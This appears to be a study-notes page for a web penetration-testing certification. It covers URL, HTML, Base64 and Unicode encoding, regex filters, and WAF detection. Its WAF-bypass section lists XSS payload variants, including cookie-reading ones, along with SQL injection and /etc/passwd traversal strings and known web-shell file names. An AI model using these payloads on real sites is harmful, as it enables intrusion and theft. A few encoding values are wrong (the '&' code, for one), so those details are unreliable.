Encoding & Filtering

Filtering with Regex, Types of encoding, Bypass WAF and More

PreviouseWPTXv2 Preparation NextEvasion Basics

Last updated 14 days ago

Encoding & Filtering

Filtering with Regex, Types of encoding, Bypass WAF and More

Data Encoding Basics

URL encoding

This table is a character encoding chart that is useful in explaining which characters are “safe” and which characters should be encoded in URLs.

Some commonly encoded characters are:

Character

Purporse in URL

Encoding

’#’

Separate anchors

%23

’?’

Separate query string

%3F

‘&’

Separate query elements

%24

’%’

Indicates an encoded character

%25

’/’

Separate domain and directories

%2F

’+’

Indicates a space

%2B

‘'

Not recommended

%20 or +

HTML encoding

Documents transmitted via HTTP can send a charset parameter in the header to specify the character encoding of the document sent. This is the HTTP header: Content-Type

Content-Type:text/html;charset=utf-8

Define character encoding using HTTP

# PHP > Uses the header() function to send a raw HTTP header:
header('Content-Type:text/html;charset=utf-8')

# ASP.Net > Uses the response object:
<%Response.charset="utf-8"%>

# JSP > Uses the page directive:
<%@ page contentType="text/html; charset=UTF-8"%>

# Using directive META:
<meta http-equiv="Content-Type" Content="text/html;charset=utf-8">

# With HTML5, is also possible to write:
<meta charset="utf-8">

HTML4 and HTML5 specifications about special characters

Characters references must start with a U+0026 AMPERSAND character (&):

CHaracter Reference

Rule

Encoded character

Named entity

& + named character references + ;

&It;

Numeric Decimal

& + # + + ;

Numeric Hexadecimal

& + #x + + ;

< / &#X3C;

Some Variations:

CHaracter Reference

Variation

Encoded character

Numeric Decimal

No terminator (;)

One or more zeroes before code

&#060 / &#0000060

Numeric Hexadecimal

No terminator (;)

&#x3c

One or more zeroes before code

&#0x3c / &#00003c

Base (36|64) encoding

Base 36 Encoding Scheme

Base36 - Its the most compact, case-insensitive, alphanumerical system using ASCII characters. In fact, the schemes alphabet contains all digits [0-9] and Latin letters [A-Z]

Its used in many real-world scenarios

Reddit used if For identifying both posts and comments

Some URL shortening services like TinyURL use Base36 integer as compact, alphanumeric identifiers.

PHP

PHP uses the base_convert() function to convert numbers:

OHPE is Base 10 is <?=base_convert("OHPE",36,10);?>

JavaScript JavaScript used two functions:

(1142690.toString(36)
1142690..toString(36) #encode
parseInt("ohpe",36)   #decode

Base64 Encoding Scheme

Base64 is one of the most widespread binary-to-text encoding schemes to date. It was designed to allow binary data to be represented as ASCII string text.

The alphabet of the Base64 encoding scheme is composed of digits [0-9] and Latin letters, both upper and lower case [a-zA-Z], For a total of 62 values. To complete the character set to 64 there are the plus (+) and slash (/) characters.

The algorithm divides the message into groups of 6 bits* and then converts each group, with the respective ASCII character, following the conversion table.

Thats why the allowed characters are 64 (2 raised to 6th power = 64)

If the lastest gruop is null(000000) the respective encoding value is =
If the traiing null groups are two, then will be encoded as ==

PHP PHP used base64_encode and base64_decode functions based on MIME Base64 implementation:

<?=base64_encode('encode this string')?> //encode
<?=base64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n')?> //decode

JavaScript Many browsers can handle base64 natively through function btoa and atob:

window.btoa('encode this string'); //encode
window.atob('ZW5jb2RlIHRoaXMgc3RyaW5n'); //decode

Unicode encoding

Unicode aka ISO/IEC 10646 Universal Character Set. It can expose web applications to possible security attacks, like bypass filters.

UTF = Unicode Transformation Format:

- UTF-8
- UTF-16
- UTF-32

Homoglyph | Visual Spoofing

In typography, a Homoglyph is one or two or more characters, or glyphs, with shapes that either appear identical or cannot be differentiated by quick visual inspection. -Wikipedia

Homograph - a word that looks the same as another word
Homogliph - a look-like character used to create homographs

Example:
Visual Sp'oo'fing = U+006F (Latin small letter o)
U+03BF (Greek small letter omicron)

They can bypass anti cross-site scripting and SQL Injection filters;

There are other ways in which characters and strings can be transformed by software processes, such as normalization, canonicalization, best fit mapping, etc

Extra Resources

Multiple (De|En) Codings

Its common to abuse multiple encodings to bypass security measures
```
URL-Encoding > URL
```

Filtering Basics

A common, yet often recommended, best practice to protect web applications against malicious attacks is the use of specific input filtering and output encoding controls.

These kings of controls may range from naive blacklists to experienced and higly restrictive whitelists. What about in the real world? We are somewhere in the middle!

Control can be implemented at different layers in a web application. They can be represented as either libraries and APIs, or in the best case, by internal specialits or external organizations, like ESAPI by OWASP.
Security Controls are also inside most common browsers.

Generally, these solutions fall into the IDS and IPS world, but FOr Web Applications, the most chosen are the Web Application Firewall (WAFs)

Regular Expressions (RE or RegEx)

Represents the official way used to define the filter rules. Mastering RegEx is fundamental to understand how to bypass filters because RE are extremely powerful.
Its a special sequence of characters used For describing a search pattern.

→ regular expression = regex

→ pattern matched = match

Two main types

Engine

Program

DFA

awk, egrep, MySQL, Procmail

NFA

.NET languages, Java, Perl, PHP, Python, Ruby, PCRE library, vi, grep, less, more

Non-printing characters:

its used to evade bad filters and obfuscate the payload.

Match Unicode Code Point:

Regular expression flavors that work with Unicode use specific meta-sequences to match code points.
The sequence is \ucode-point, where code-point is the hexadecimal number of the character to match. 
There are regex flavors like PCRE that do not support the former notation, 
but use an alternative sequence \x{code-point} in its place.

example:

\u2603   = the snowman character in .NET, Java, Javascript and Python
\x{2603} = the snowman character in Apache and P.NETHP (PCRE library)

Meta-sequence Quality:

\p{quality-id} = have a specific quality
\P{quality-id} = do not have quality

Match Unicode Category:

# To match the string with all the case variations (lower, upper and title), this regex does the job:
[\p{Ll}\p{Lu}\p{Lt}]

# As a shorthand, some regex flavors implement this solution:
\p{L&}

Web Application Firewal - WAF

ByPass WAFs

|-| = instead of using this
|→| = the best choice is

Cross-Site Scripting:

- alert('xss') 
- alert(1)
→ prompt('xss') 
→ prompt(8)
→ confirm('xss')
→ confirm(8)
→ alert(/xss/.source)
→ window[/alert/.source](8)

- alert(document.cookie) 
→ with(document)alert(cookie) 
→ alert(document['cookie'])
→ alert(document[/cookie/.source])
→ alert(document[/coo/.source+kie/.source])

- <img src=x onerror=alert(1);>
→ <svg/onload=alert(1)>
→ <video src=x onerror=alert(1);>
→ <audio src=x onerror=alert(1);>

- javascript:alert(document.cookie)
→ data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

Blind SQL Injection

- 'or 1=1           '
- 'or 6=6           '
→ 'or 0x47=0x47     '
- or char(32)=''
→ or 6 is not null

- UNION SELECT
→ UNION ALL SELECT

Directory Traversal

- /etc/passwd
→ /too/../etc/far/../passwd
→ /etc//passwd
→ /etc/ignore/../passwd
→ /etc/passwd........

Web Shell

- c99.php
- r57.php
- shell.aspx
- cmd.jsp
- CmdAsp.asp
- augh.php

Detection and Fingerprinting

Citrix Netscaler uses some different cookies in the HTTP responses like ns_af or citrix_ns_id or NSC_
F5 BIG-IP ASM (Application Security Manager) uses cookies starting with TS and followed with a string that respect the following regex:

^TS[a-z-A-Z0-9]{3,6}

Barracura uses two cookies barra_counter_session and BNI__BARRACUDA_LB_COOKIE

Header Rewrite

Some WAFs rewrite the HTTP headers. Usually these modify the Server Header to deceive the attackers.

HTTP Response Code

Some WAFs modify the HTTP response codes if the request is hostile; For example:

- mod_security       > 406 Not Acceptable
→ AQTRONIX WebKnight > 999 No Hacking

HTTP Response Body

its also possible to detect in the response body

Example:

<body>

…Mod_Security…

…AQTRONIX WebKnight …

</body>

</body

dotDefender Blocked your Request

Close Connection

its useful in dropping the connection in the case the WAF detects a malicious request

mod_security

Detect WAF

wafw00f is a tool written in python that can detect up to 20 different WAF products

The techniques used to detect a WAF are similar to those we have seen previously:

Cookies
Server Cloaking
Response Codes
Drop Action
Pre-Built-in Rules

→ nmap –script=http-waf-fingerprint -p 80

Client-Side Filters

Browsers are the primary mean used to address client-side attacks

Browser Add-ons

NoScript Security Suite is a whitelist-based security tool that basically disables all the executable web content (Javascript, Java, Flash, Silverlight, …) and lets the user choose which sites are trusted, thus allowing the use of these technologies.

XSS Filter (IE)

c:\windows\system32\mshtml.dll library. Ways to inspect:

# Hex editors like WinHex. Notepad++ with TextFX plugin
# IDAPro
# MS-DOS commands

findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll | find "{"
> savepath //u can save to a file For more readable results

Neutering in Action

Basically, once a malicious injection is detected, the XSS Filter modified the evil part of the payload by adding the ‘#’ character in place of the neuter chracter, defined in the rules.

evil > ev{i}l > ev#l
<svg/onload=alert(1)> = <svg/#nload=alert(1)>

Web sites that chose to opt-out of this protection can use the HTTP response header:

X-XSS-Protection: 0
X-XSS-Protection: 1; mode=block //instead of sanitize the page, will render a simple #
# others browsers like safari, used the same scheme

enabled by default in browsers such as: chrome, opera and safari

THe filter analyzes both the inbound requests and the outbound. If, in the parsed HTML data, it finds executable code within the response, then it stops the script and generates a console alert similar to the following. The XSS Auditor refused to execute a script in …